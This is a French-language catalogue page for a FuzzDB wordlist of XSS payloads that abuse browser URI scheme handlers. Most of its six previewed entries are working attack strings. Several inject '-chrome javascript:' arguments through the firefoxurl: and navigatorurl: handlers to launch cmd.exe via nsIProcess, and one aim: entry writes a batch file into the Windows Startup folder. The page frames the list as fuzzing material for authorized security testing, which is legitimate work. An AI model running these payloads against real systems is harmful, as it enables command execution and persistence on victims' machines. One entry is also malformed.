FuzzDB XSS URI Handler Payloads
Charges utiles XSS multi-navigateurs détournant des gestionnaires de schémas URI personnalisés (aim:, firefoxurl:, navigatorurl:, res:) pour parvenir à l'exécution de script ou au lancement de commande locale.
- Taille
- 1.8 KB
- Catégorie
- Fuzzing
- Source
- fuzzdb-project/fuzzdb
- Licence
- GPLv2
- Outils recommandés
- burpffufwfuzz
Aperçu
Les 6 premières entrées. Téléchargez ou copiez la liste complète (1.8 KB) avec les boutons ci-dessus.
aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"
firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"
navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
firefoxurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)Charges utiles XSS multi-navigateurs détournant des gestionnaires de schémas URI personnalisés (aim:, firefoxurl:, navigatorurl:, res:) pour parvenir à l'exécution de script ou au lancement de commande locale.
Cette liste est conçue pour le fuzzing d'entrées et la découverte de vulnérabilités. Elle pèse environ 1.8 KB et se marie bien avec des outils tels que burp, ffuf, wfuzz. Choisissez la plus petite liste adaptée à votre mission : les listes plus courtes sont plus rapides et plus discrètes pour les attaques en ligne, tandis que les listes plus volumineuses offrent une couverture plus large pour le travail hors ligne, où la vitesse est une contrainte moindre.
Vous pouvez copier l'aperçu d'exemple directement depuis cette page, copier la liste entière dans
votre presse-papiers, ou télécharger le fichier .txt brut. La liste complète est servie directement
depuis sa source d'origine sur GitHub.
Provenant de fuzzdb-project/fuzzdb et distribuée sous licence GPLv2. N'utilisez les listes de mots que contre des systèmes que vous êtes explicitement autorisé à tester.